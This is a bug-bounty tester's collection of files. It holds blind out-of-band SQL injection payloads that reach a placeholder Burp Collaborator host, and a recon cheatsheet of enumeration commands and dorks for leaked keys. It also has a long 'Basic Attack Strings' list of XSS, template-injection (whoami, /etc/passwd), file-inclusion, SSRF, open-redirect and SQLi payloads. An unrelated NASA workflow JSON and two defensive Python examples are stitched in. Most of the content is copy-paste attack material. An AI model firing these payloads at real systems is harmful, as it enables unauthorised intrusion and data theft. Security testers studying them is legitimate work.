├── SQLi Blind OOB payloads
├── recon cheatsheet
├── testnasaworkflow.json
└── Basic Attack Strings

--------------------------------------------------------------------------------
/SQLi Blind OOB payloads:
--------------------------------------------------------------------------------
'+UNION+SELECT+extractvalue(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f>+%25remote%3b]>'),'/l')+FROM+dual--
';+UNION+SELECT+extractvalue(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f>+%25remote%3b]>'),'/l')+FROM+dual--
"+UNION+SELECT+extractvalue(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f>+%25remote%3b]>'),'/l')+FROM+dual--
";+UNION+SELECT+extractvalue(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f>+%25remote%3b]>'),'/l')+FROM+dual--
' UNION SELECT UTL_INADDR.get_host_address('YOUR-SUBDOMAIN-HERE.burpcollaborator.net')--
'; UNION SELECT UTL_INADDR.get_host_address('YOUR-SUBDOMAIN-HERE.burpcollaborator.net')--
" UNION SELECT UTL_INADDR.get_host_address('YOUR-SUBDOMAIN-HERE.burpcollaborator.net')--
"; UNION SELECT UTL_INADDR.get_host_address('YOUR-SUBDOMAIN-HERE.burpcollaborator.net')--
' exec master..xp_dirtree '//YOUR-SUBDOMAIN-HERE.burpcollaborator.net/a'--
'; exec master..xp_dirtree '//YOUR-SUBDOMAIN-HERE.burpcollaborator.net/a'--
" exec master..xp_dirtree '//YOUR-SUBDOMAIN-HERE.burpcollaborator.net/a'--
"; exec master..xp_dirtree '//YOUR-SUBDOMAIN-HERE.burpcollaborator.net/a'--
' copy (SELECT '') to program 'nslookup YOUR-SUBDOMAIN-HERE.burpcollaborator.net'--
'; copy (SELECT '') to program 'nslookup YOUR-SUBDOMAIN-HERE.burpcollaborator.net'--
" copy (SELECT '') to program 'nslookup YOUR-SUBDOMAIN-HERE.burpcollaborator.net'--
"; copy (SELECT '') to program 'nslookup YOUR-SUBDOMAIN-HERE.burpcollaborator.net'--
' LOAD_FILE('\\\\YOUR-SUBDOMAIN-HERE.burpcollaborator.net\\a')--
'; LOAD_FILE('\\\\YOUR-SUBDOMAIN-HERE.burpcollaborator.net\\a')--
" LOAD_FILE('\\\\YOUR-SUBDOMAIN-HERE.burpcollaborator.net\\a')--
"; LOAD_FILE('\\\\YOUR-SUBDOMAIN-HERE.burpcollaborator.net\\a')--

--------------------------------------------------------------------------------
/recon cheatsheet:
--------------------------------------------------------------------------------
Go the road less travelled, find programs that are not on hackerone or bugcrowd:
https://www.bugcrowd.com/bug-bounty-list/
google: "Responsible Disclosure" or "Vulnerability Disclosure" or "responsible disclosure website list"
google: responsible disclosure "bounty"
Responsible Disclosure seems to give best results.
intext:"Responsible Disclosure Policy"
"responsible disclosure" "private program"
"responsible disclosure" "private" "program"

Google Dork:
vulnerability disclosure program "bounty" -bugcrowd -hackerone
responsible disclosure "private program" <--- find private hackerone/bugcrowd programs
=========================================================================
Google Dorker:
https://github.com/random-robbie/bugbountydork/blob/master/main.py

Subdomain Enumeration:
./amass -active -v -d test.com OR /root/go/bin/amass -active -v -d test.com
./subfinder -d test.com OR /root/go/bin/subfinder -d test.com
./subfinder -b -w /root/Desktop/jhaddixALL/subdomainsALL.txt -d upwork.com -v
python sublist3r.py -b -d example.com -v -t 40 -o example.txt
python sublist3r.py -p 21,22,3389,8080,8181,8000,9443,8443,6900
aquatone-discover -d test.com
Enumeration with aquatone: https://blog.it-securityguard.com/visual-recon-a-beginners-guide/

========================================================================
Subdomain Analysis:

Subdomain bruteforcing:
./subfinder -d example.com -b -dL jasonhaddixall.txt OR /root/go/bin/subfinder -d test.com -b -dL jasonhaddixall.txt

Subdomain Analysis:
./EyeWitness.py --prepend-https -f /root/vanillasublister.txt --web --user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36" -d targetvanilla

Port Scanning:
nmap -p 21,22,3389,8080,8181,8000,9443,8443,6900 -iL targets.txt
aquatone-scan -d uber.com -t 30 -p medium
aquatone-scan -d test.com -t 30 -p small (small is port 443 and 80)

webscreenshot -i /tmp/adobeurls.txt -o /targets/adobe.com -v
webscreenshot -i /tmp/adobeurls.txt -o /targets/adobe.com -v -m (HTTP & HTTPS)
epg-prep /root/adobe.com
node yourname.js
http://yourserverip:3000/photos

site:site.com ext:php,asp,aspx,jsp,jspa,txt,swf

http://archive.org/web/ (if a subdomain name indicates critical data, e.g. config.test.com or admin.test.com, try looking at it from the wayback machine; it may show critical data (API keys, user/pass))
site:admin.target.com (if the website returns 403, try google dorking the website to see if there are any endpoints you can access)
-can also try searching the wayback machine for endpoints via curl (https://github.com/internetarchive/wayback/blob/master/wayback-cdx-server/README.md)
-curl 'http://web.archive.org/cdx/search/cdx?url=games.sidefx.com/*&output=text&fl=original&collapse=urlkey'
^^^ more info https://www.shawarkhan.com/2018/06/getting-php-code-execution-and-leverage.html
You can query commoncrawl.org to discover endpoints as well:
python3 cc.py github.com -y 18 -o github_2018.txt

Subdomain Takeover:
aquatone-takeover -d adobe.com

CORS Testing:

==========================================================

Directory Bruteforcing:
./dirsearch.py -u http://target.com -e * -r
./dirsearch.py -u http://target.com -e * -r -w /root/Desktop/jhaddixALL/directoriesjhaddix.txt --plain-text-report=/root/Desktop/report

Finding directories:
./dirsearch.py -u http://target.com -L /root/jhaddix/jhaddixdirectories.txt
https://gist.github.com/jhaddix/b80ea67d85c13206125806f0828f4d10 <---- jason haddix directory bruteforce list
./dirsearch.py -u http://target.com -e * -r -w /opt/tools/directorywordlists/raft-medium-directories.txt --plain-text-report=/root/Desktop/report <---- bruteforce directory
LOOK FOR GOBUSTER

dirb 10 threads, jason haddix wordlist
============================================================


Once new directories are found, find files in those directories:
./dirsearch.py -u http://target.com -r -w /opt/tools/directorywordlists/raft-medium-files.txt --plain-text-report=/root/Desktop/report <---- bruteforce files
./dirsearch.py -u http://target.com -e * -r

===========================================================
Find scripts:
site:test.com ext:php
site:test.com ext:asp

github recon:
site:github.com inurl:looker "api" "key"
site:github.com inurl:looker "password"

Endpoint Discovery:
Linkfinder
Target Tab > Right Click Target.com > Save Selected Items
python linkfinder.py -o cli -i burpfile

Link Finder
Target Tab > Right Click Target.com > Engagement Tools > Find Scripts
Ctrl A > Copy Selected URLs (Paste to textfile linkfinder.txt)
cat linkfinder.txt | grep .js > linkfinder2.txt
python linkfinder.py -o cli -i http://target.com/everylink.js
OR copy and paste into JSParser:
python handler.py (visit localhost:8008)
===============================================
https://whatcms.org/ discover type of CMS running on website


--------------------------------------------------------------------------------
/testnasaworkflow.json:
--------------------------------------------------------------------------------
{
  "name": "NASA workflow",
  "nodes": [
    {
      "parameters": {},
      "id": "65ac0a56-a477-4f74-9952-c164a309bcea",
      "name": "Start",
      "type": "n8n-nodes-base.start",
      "typeVersion": 1,
      "position": [
        240,
        300
      ]
    },
    {
      "parameters": {
        "triggerTimes": {
          "item": [
            {
              "mode": "everyWeek"
            }
          ]
        }
      },
      "id": "f82afb85-8659-4871-b2f1-dbac9244a4d8",
      "name": "Cron",
      "type": "n8n-nodes-base.cron",
      "typeVersion": 1,
      "position": [
        460,
        300
      ]
    },
    {
      "parameters": {
        "resource": "donkiSolarFlare",
        "additionalFields": {
          "startDate": "={{$today.minus({days: 7}).toFormat('yyyy-MM-dd')}}",
          "endDate": "2022-10-13T07:00:00.000Z"
        }
      },
      "id": "1a29b28e-ea0c-47d9-8e36-1bddeeec4733",
      "name": "NASA",
      "type": "n8n-nodes-base.nasa",
      "typeVersion": 1,
      "position": [
        680,
        300
      ],
      "credentials": {
        "nasaApi": {
          "id": "8",
          "name": "NASA account"
        }
      }
    }
  ],
  "pinData": {
    "NASA": [
      {
        "json": {
          "flrID": "2022-10-10T00:35:00-FLR-001",
          "instruments": [
            {
              "displayName": "GOES-P: EXIS 1.0-8.0"
            }
          ],
          "beginTime": "2022-10-10T00:35Z",
          "peakTime": "2022-10-10T00:47Z",
          "endTime": "2022-10-10T00:55Z",
          "classType": "M1.0",
          "sourceLocation": "N25W23",
          "activeRegionNum": 13116,
          "linkedEvents": null,
          "link": "https://webtools.ccmc.gsfc.nasa.gov/DONKI/view/FLR/21955/-1"
        }
      },
      {
        "json": {
          "flrID": "2022-10-10T16:07:00-FLR-001",
          "instruments": [
            {
              "displayName": "GOES-P: EXIS 1.0-8.0"
            }
          ],
          "beginTime": "2022-10-10T16:07Z",
          "peakTime": "2022-10-10T16:28Z",
          "endTime": "2022-10-10T16:47Z",
          "classType": "M2.4",
          "sourceLocation": "N25W33",
          "activeRegionNum": 13112,
          "linkedEvents": null,
          "link": "https://webtools.ccmc.gsfc.nasa.gov/DONKI/view/FLR/21963/-1"
        }
      },
      {
        "json": {
          "flrID": "2022-10-11T08:36:00-FLR-001",
          "instruments": [
            {
              "displayName": "GOES-P: EXIS 1.0-8.0"
            }
          ],
          "beginTime": "2022-10-11T08:36Z",
          "peakTime": "2022-10-11T08:42Z",
          "endTime": "2022-10-11T08:46Z",
          "classType": "M3.9",
          "sourceLocation": "N24W35",
          "activeRegionNum": 13112,
          "linkedEvents": [
            {
              "activityID": "2022-10-11T09:23:00-CME-001"
            }
          ],
          "link": "https://webtools.ccmc.gsfc.nasa.gov/DONKI/view/FLR/21973/-1"
        }
      },
      {
        "json": {
          "flrID": "2022-10-11T10:47:00-FLR-001",
          "instruments": [
            {
              "displayName": "GOES-P: EXIS 1.0-8.0"
            }
          ],
          "beginTime": "2022-10-11T10:47Z",
          "peakTime": "2022-10-11T10:52Z",
          "endTime": "2022-10-11T10:57Z",
          "classType": "M1.5",
          "sourceLocation": "N24W36",
          "activeRegionNum": 13112,
          "linkedEvents": [
            {
              "activityID": "2022-10-11T11:36:00-CME-001"
            }
          ],
          "link": "https://webtools.ccmc.gsfc.nasa.gov/DONKI/view/FLR/21974/-1"
        }
      },
      {
        "json": {
          "flrID": "2022-10-12T16:26:00-FLR-001",
          "instruments": [
            {
              "displayName": "GOES-P: EXIS 1.0-8.0"
            }
          ],
          "beginTime": "2022-10-12T16:26Z",
          "peakTime": "2022-10-12T16:29Z",
          "endTime": "2022-10-08T16:33Z",
          "classType": "C4.7",
          "sourceLocation": "N25W55",
          "activeRegionNum": 13112,
          "linkedEvents": [
            {
              "activityID": "2022-10-12T17:12:00-CME-001"
            }
          ],
          "link": "https://webtools.ccmc.gsfc.nasa.gov/DONKI/view/FLR/21999/-1"
        }
      },
      {
        "json": {
          "flrID": "2022-10-12T23:54:00-FLR-001",
          "instruments": [
            {
              "displayName": "GOES-P: EXIS 1.0-8.0"
            }
          ],
          "beginTime": "2022-10-12T23:54Z",
          "peakTime": "2022-10-13T00:19Z",
          "endTime": "2022-10-13T00:37Z",
          "classType": "M1.5",
          "sourceLocation": "N25W65",
          "activeRegionNum": 13112,
          "linkedEvents": null,
          "link": "https://webtools.ccmc.gsfc.nasa.gov/DONKI/view/FLR/21998/-1"
        }
      }
    ]
  },
  "connections": {
    "Cron": {
      "main": [
        [
          {
            "node": "NASA",
            "type": "main",
            "index": 0
          }
        ]
      ]
    }
  },
  "active": false,
  "settings": {},
  "id": 15,
  "meta": {
    "instanceId": "32fd5f12d82daccde80319b7d5d826a11a96ed956c170eb7505d0458088a7b03"
  },
  "tags": []
}
--------------------------------------------------------------------------------
/Basic Attack Strings:
--------------------------------------------------------------------------------
Not a complete list by any means, but when you're manually testing and walking through sites and need a quick copy/paste, this can come in handy...
https://github.com/1N3/IntruderPayloads

malicious DTD:
"> %eval; %exfiltrate;


Testing payment flow:
Change the order quantity to 0.6 or 0.2; you may be able to pay significantly less for an item: https://hackerone.com/reports/403783
============================================================
Password Reset Token not expiring after new one generated: https://hackerone.com/reports/15166

=============================================================

Misconfigured CORS:
Inject the following header in the request:
Origin: https://example.com
If the server responds with the following, it is reflecting an arbitrary origin with credentials:
Access-Control-Allow-Origin: https://example.com
Access-Control-Allow-Credentials: true

You can also try:
Origin: null
and hopefully get:
Access-Control-Allow-Origin: null
Access-Control-Allow-Credentials: true

============================================================
Improper Access Control:
If you notice two types of user accounts, like shop owner and shop user, try sending HTTP requests that only the shop owner can send as the shop user.
-If creating a new shop is only available to the shop owner, try sending the HTTP request that creates a new shop as the shop user.

Testing different levels of users, admin vs user
-can a regular user send an HTTP request that only admins should be able to send? example: https://hackerone.com/reports/219192
==========================================================

Subdomain takeover:
aquatone-takeover -d test.com
============================================================


Company
First Last
username
username@mailinator.com
Password123$
+1416312384
===================================================================================================

IDOR:
Try bruteforcing hashed numerical IDs with intruder
Try to identify parameters which aren't essential to the request. Use repeater to delete each parameter one at a time

Interesting IDOR where it was only validating that the username belonged to the specific record ID: https://hackerone.com/reports/148764
===================================================================================================

Race Conditions:
"Copy as Curl Command"

===================================================================================================
API Calls:
-Try to discover every single request method, and execute each request method with users of different privilege levels
- GET, POST, PUT, DELETE, HEAD, OPTIONS, PATCH
-Test for IDORs
-Discover API Endpoints
-Google Dorks site:target.com inurl:/api/v2
-Query wayback machine: target.com/api/*
-CC.py
-Send the same API request multiple times to see if it triggers anything (coupon codes, etc)
-If you ever come across an undocumented or internal API, always try to conduct a comprehensive mapping and recon to uncover all edges that might lack sufficient authorization. https://yassineaboukir.com/blog/
-He found an API https://www.company.com/api/users// and discovered an edge located at /credit_cards/. This unknown edge allowed him to discover credit card numbers and mail messages of users

===================================================================================================

OPEN REDIRECT:
google.com
https://google.com
//google.com
//google.com/?:
.google.com
https:google.com
//google%E3%80%82com
\/\/google.com/
/\/google.com/
//google%00.com
/%09/google.com
/%5cgoogle.com
//www.google.com/%2f%2e%2e
//www.google.com/%2e%2e
/\victim.com:80%40google.com
http://www.theirsite.com@yoursite.com/ (oldie, but browsers will redirect to anything after @)
http://www.yoursite.com/http://www.theirsite.com/
";alert(0);//
java%0d%0ascript%0d%0a:alert(0)
javas cript://www.google.com/%0Aalert(1) (thank you to https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xss.md)
%2F%2F%2Fjavascript:alert(document.domain); https://yassineaboukir.com/blog/
data:text/html;base64,PHNjcmlwdD5hbGVydChsb2NhdGlvbik8L3NjcmlwdD4=%23// https://yassineaboukir.com/blog/

===================================================================================================
Rate Limits:
%00, %0d%0a, %09, %0C, %20, %0
firstlastcompany%0a%0d%00

Test to see if a certain functionality can be abused by spammers. (Sending Emails, Posting Comments, Posting)

===================================================================================================

File Inclusion:
https://google.com/.injectx/rfi_vuln.txt
https://google.com/.injectx/rfi_vuln.txt?`whoami`
https://google.com/.injectx/rfi_vuln.txt%00.png
https://google.com/.injectx/rfi_vuln.txt%00.html
page=1
page=./1
page=.//1
page=././1
page=../pages/1
page=\1
../../../../../../../../../../../etc/passwd%00
file://path/to/file
file:///etc/./passwd

===================================================================================================
how to fuzz for XSS:

;
"test123
'test123
" onerror=alert(1)
javascript:alert(1)
"+alert(1)+ (if in script tags)
(sometimes HTML tags aren't blocked due to markdown, try to test the event handlers)

XSS Fuzzing:
test123
test123
;test123
"test123
'test123
">
Hello :)
alert/**/(1)// instead of alert(1)
https://www.youtube.com/channel/UCfEQwwHP5t-MFdF-647n79w?fuzzing" onload=alert(document.domain) x=" <--------- https://hackerone.com/reports/333008

Cross Site Scripting:
Reflected Parameters
javascript:alert(1)//
">' --
">' --
'>">
INJECTX'>">">'>
">>" ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg">
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*
javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*
javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//
javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
javascript://plus.google.com/?%0aalert%28document.domain%29 FRANS ROSEN https://labs.detectify.com/2015/06/06/google-xss-turkey/

https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xss.md
===================================================================================================

Server Side Template Injection:
Backslash Powered Scanner

{{4*4}}[[5*5]] <---- if we identify angularJS template engine running
{{4+4}}
{7*7}
"></script>{{2*2}}${2*2}
7*7
<%=`id`%> (ruby template engine)
\x41
{% import os %}{{ os.popen("whoami").read() }}
{% import os %}{{ os.popen("cat /etc/passwd").read() }}

===================================================================================================

Command Injection:
sleep 5; sleep 5 || sleep 5 | sleep 5 & sleep 5 && sleep 5
Backslash Powered Scanner

===================================================================================================
SSRF:
file :///asd
file :///etc/passwd
127.0.0.1.xip.io
If you cannot access any sensitive services via SSRF, try to access sensitive files or pages that require higher application level privileges:
https://hackerone.com/reports/312647
If SSRF is rendering the website you are pointing it to, see if you can point it to an XSS.html file that you host on your server:
https://hackerone.com/reports/197902
===================================================================================================

SQLi:
Backslash Powered Scanner
SQLipy
Rule of thumb: What payloads trigger an error message or an HTTP 500?
id=1‘
'"
1‘’
1%cc‘
1’-sleep(10)-’
+sleep(1)+
1"
1"“
1%cc”
1"-sleep(10)-”
1/1
1/0
1/sleep(10)
1\
admin" or "1"="1"--
admin' or '1'='1'--
/*'*/
'-sleep(100) -- <---- username field
-sleep/*f*/(10) <------ integer item_id=111-sleep/*f*/(10)


SQLi Fuzzing:
Rule of thumb: What payloads trigger an error message or an HTTP 500? How does the baseline request compare with the fuzzing request? Are the same results returned?
Do the results of the query change after inserting these? If you get different results then you are probably modifying the query

--
'
\'
'%23
'#
' --
-- ' (try commenting out the quote)
# ' (try commenting out the quote) if the query still works, then you just introduced sql comments into the query
%23 ' (try commenting out the quote)
%2527 (some servers will double URL decode)
)
))
/*'*/ (try commenting out the quote)
'' vs ''' (even vs odd number of quotes)
id=460-5 (try subtracting)
input) order by 5%23
2/*dhab bc*/OR/*dahdshka*/2/*sd*/LIKE/*da*/"2"/**/%23
' waitfor delay'00:00:10'-- -


SQLi Polyglots:
SLEEP(1) /*‘ or SLEEP(1) or ‘“ or SLEEP(1) or “*/
SELECT 1,2,IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/ FROM some_table WHERE ex = ample
IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/

SQL injection in JSON: https://hackerone.com/reports/150156


Blind SQLi
‘%2Bbenchmark(3200,SHA1(1))%2B’
' or benchmark(10000000,md5(1))='
‘+BENCHMARK(40000000,SHA1(1337))+’

Time/Blind Based SQLi:
Check out "SQL Injection Time Based Payloads"
https://github.com/fuzzdb-project/fuzzdb/tree/master/attack/sql-injection/payloads-sql-blind
===================================================================================================

RCE:
page=1`sleep 10
1|sleep 10
1$(sleep 10)
1%0asleep 10%0a
--------------------------------------------------------------------------------
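The "Misconfigured CORS" section above describes a check that is simple to automate on the defensive side. The following is an added example written for this page, not code from the cheatsheet's repository: it classifies a request Origin and the response headers into the reflected-origin-with-credentials case the section describes (including the null origin), and shows the corrected server behaviour beside it. The trusted-origin allowlist and the header sets are constructed placeholders, not captured traffic.

```python
"""Classify CORS response headers for the misconfiguration the cheatsheet
describes: an arbitrary Origin (or the literal "null") echoed back in
Access-Control-Allow-Origin together with Access-Control-Allow-Credentials: true.
Added example; the header sets and allowlist below are constructed placeholders."""

from typing import Dict, Iterable


def classify_cors(request_origin: str, headers: Dict[str, str],
                  trusted_origins: Iterable[str]) -> str:
    """Return a short verdict for one request Origin / response header pair."""
    trusted = set(trusted_origins)
    # HTTP header names are case-insensitive; normalise before looking them up.
    h = {k.lower(): v.strip() for k, v in headers.items()}
    acao = h.get("access-control-allow-origin")
    creds = h.get("access-control-allow-credentials", "").lower() == "true"

    if acao is None:
        return "no-cors"                        # browser blocks cross-origin reads
    if acao == "*":
        # Browsers refuse "*" combined with credentials, so this is a weaker finding.
        return "wildcard-with-credentials" if creds else "wildcard"
    if acao in trusted and acao == request_origin:
        return "allowlisted"                    # the intended configuration
    if acao == request_origin:
        # The server echoed an origin it has no reason to trust (including "null").
        return "reflected-origin-with-credentials" if creds else "reflected-origin"
    return "mismatch"                           # ACAO names another origin; browser blocks


def safe_cors_headers(request_origin: str, trusted_origins: Iterable[str]) -> Dict[str, str]:
    """Corrected behaviour: echo only allowlisted origins, never "null", and add
    Vary: Origin so shared caches keep the per-origin answers apart."""
    if request_origin == "null" or request_origin not in set(trusted_origins):
        return {}                               # no CORS headers at all for unknown origins
    return {
        "Access-Control-Allow-Origin": request_origin,
        "Access-Control-Allow-Credentials": "true",
        "Vary": "Origin",
    }


# Constructed sample responses (not real traffic); the allowlist is a placeholder.
TRUSTED = {"https://app.example-placeholder.test"}
SAMPLES = {
    "reflects attacker origin": ("https://example.com",
        {"Access-Control-Allow-Origin": "https://example.com",
         "Access-Control-Allow-Credentials": "true"}),
    "null origin allowed": ("null",
        {"Access-Control-Allow-Origin": "null",
         "Access-Control-Allow-Credentials": "true"}),
    "allowlisted origin": ("https://app.example-placeholder.test",
        {"Access-Control-Allow-Origin": "https://app.example-placeholder.test",
         "Access-Control-Allow-Credentials": "true"}),
    "no CORS headers": ("https://example.com", {}),
}


def run_samples() -> Dict[str, str]:
    """Verdict per constructed sample, keyed by the sample's label."""
    return {name: classify_cors(origin, hdrs, TRUSTED)
            for name, (origin, hdrs) in SAMPLES.items()}


if __name__ == "__main__":
    for name, verdict in run_samples().items():
        print(f"{name:26s} -> {verdict}")
    print(safe_cors_headers("https://example.com", TRUSTED))
    print(safe_cors_headers("https://app.example-placeholder.test", TRUSTED))
```

The two flagged verdicts are the ones the section's two probes aim for; "allowlisted" is what a correctly configured server returns for the same probes, and `safe_cors_headers` shows that the fix is a strict allowlist rather than input validation on the Origin value.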
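For the SQLi and SQLi Fuzzing sections above (odd vs even quotes, commenting out the quote, the error message / HTTP 500 rule of thumb), here is an added example that is not the cheatsheet's own code: it runs a few of those probes against a string-built query and against a parameterised one on a constructed in-memory SQLite table, so the behaviour the rule of thumb relies on, and the fix, can be seen side by side. The user rows and probe list are made up for the demo.

```python
"""Why the quote / comment probes change a query's result, and what the fix looks
like. Added example; the users table and its rows are constructed for the demo."""

import sqlite3
from typing import Dict, List, Tuple


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "s3cret"), ("admin", "hunter2")])   # constructed rows
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> List[str]:
    """Builds the statement by string formatting: a quote in the input closes the
    literal and the rest of the input is parsed as SQL. Returns matching usernames,
    or a single 'ERROR: ...' entry when the parser rejects the statement (the error
    message / HTTP 500 signal the cheatsheet's rule of thumb looks for)."""
    query = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
             % (username, password))
    try:
        return [row[0] for row in conn.execute(query)]
    except sqlite3.OperationalError as exc:
        return ["ERROR: " + str(exc)]


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> List[str]:
    """Parameterised statement: the driver passes the input as data, so a quote or
    a '--' comment is compared literally against the column, never parsed."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(query, (username, password))]


# Probes taken from the lists above, paired with a wrong password.
PROBES: List[Tuple[str, str]] = [
    ("admin", "hunter2"),            # legitimate login, both paths agree
    ("'", "x"),                      # single quote: odd number of quotes -> parse error
    ("admin' or '1'='1'--", "x"),    # tautology plus comment from the SQLi list
    ("admin'--", "x"),               # comment out the password check
]


def compare() -> Dict[str, Tuple[List[str], List[str]]]:
    """Map each probe username to (vulnerable result, parameterised result)."""
    conn = make_db()
    return {u: (login_vulnerable(conn, u, p), login_safe(conn, u, p)) for u, p in PROBES}


if __name__ == "__main__":
    for probe, (vuln, safe) in compare().items():
        print(f"{probe!r:26s} vulnerable={vuln} safe={safe}")
```

The lone quote produces a parser error on the vulnerable path only, which is exactly why the cheatsheet treats error responses as the first signal; the tautology and comment probes widen or truncate the WHERE clause there, while the parameterised query returns nothing for all three because the input never reaches the SQL parser.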